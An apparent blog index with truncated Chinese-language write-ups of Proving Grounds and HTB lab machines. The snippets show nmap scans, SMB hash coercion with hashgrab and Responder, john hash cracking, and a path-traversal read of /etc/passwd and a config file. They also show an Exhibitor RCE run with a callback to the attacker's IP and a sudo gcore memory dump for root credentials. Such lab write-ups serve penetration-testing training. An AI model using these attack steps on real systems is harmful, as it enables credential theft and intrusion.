Proving Grounds Vault Writeup
Proving Grounds VaultRecon: 1nmap 192.168.183.172 -p- --min-rate 2000 -Pn -sT 1nmap 192.168.183.172 -p53,88,135,139,389,445,464,593,636,3268,3269,3389,9389 -sC -sV -Pn 查看SMB共享: 1smbmap -H 192.168.183.172 -u guest 使用hashgrab生成NTLM强制认证文件: 1python hashgrab.py 192.168.45.222 test 访问SMB放入文件: Responder可以捕获到响应: 破解password: 枚举Bloodhound: 1bloodhound-python -c all -u anirudh -p SecureHM -d vault.offsec -ns 192.168.183.172 --zip 上传Bloodhound: 用户...
Proving Grounds CVE-2024-27292 Writeup
Recon:1nmap 192.168.159.94 -p- -Pn -sT --min-rate 2000 1nmap 192.168.159.94 -p 22,80 -sC -sV Getshell:根据环境机器的主题CVE-2024-27292去谷歌搜索,可以搜索到一大堆POC,但是暂时还未找到对应的漏洞代码分析,也仅仅找到了这一篇文章: 1https://tantosec.com/blog/docassemble/ 漏洞利用: 1http://192.168.159.94/interview?i=/etc/passwd 读取配置文件: 1http://192.168.159.94/interview?i=/usr/share/docassemble/config/config.yml 获取到Postgresql数据库账号密码: 漏洞分析文章的作者特别表述了这段代码: 123456789101112131415161718192021222324252627282930def update(self, **kwargs): try: ...
Proving Grounds Nara Writeup
Recon:1nmap 192.168.159.30 -p- -Pn -sT --min-rate 2000 1nmap 192.168.159.30 -p53,88,135,139,389,445,593,3389,5985 -sC -sV -Pn GetShell:目标域名为: 1nara.nara-security.com 枚举共享信息: 1smbmap -d nara.nara-security.com -u guest -H 192.168.159.30 1smbclient //192.168.159.30/nara 文件中是一份说明: SMB目录会定时有人访问,采取强制认证捕获hash,使用脚本工具批量生成强制认证文件: 1https://raw.githubusercontent.com/dharanivarma/Pentesting-Tools/main/hashgrab.py 放入SMB共享目录中: 捕获到hash: 使用john破解: 1john hash -w=/usr/share/wordlists/rockyou.txt...
Proving Grounds Pelican Writeup
Recon:1nmap 192.168.162.98 -Pn -n -sT --min-rate 2000 1nmap 192.168.162.98 -p 22,139,445,631,2222,8080,8081 -sC -sV -Pn GetShell:访问8081会重定向到8080web服务: 中间件名为Exhibitor,在谷歌上可以找到一个exploit: 1https://github.com/thehunt1s0n/Exihibitor-RCE 1bash exploit.sh 192.168.162.98 8080 192.168.45.172 443 Getroot:执行sudo -l 可以发现一个提权向量: 搜寻gcore的相关用法,如下: 1sudo /usr/bin/gcore -a -o result 496 输出文件core.496为乱码,使用字符串格式打开: 1strings core.496 可以i切换至root:
HTB Hospital Writeup
Portinfo:1nmap 10.10.11.241 -n -Pn -p- -sT --min-rate 2000 1nmap 10.10.11.241 -p22,53,88,135,139,443,445,389,1801,2103,2105,2107,2179,3389,6404,6406,6407,6409,6617,6639,8080,9389 -sC -sV -oN portinfo.txt -Pn 目标域名为hospital.htb,Windows机器,但是有Ubuntu的SSH服务,疑似存在容器,端口映射的现象。 GetShell:8080端口运行一个web服务: 获取目录信息: 1dirsearch -u...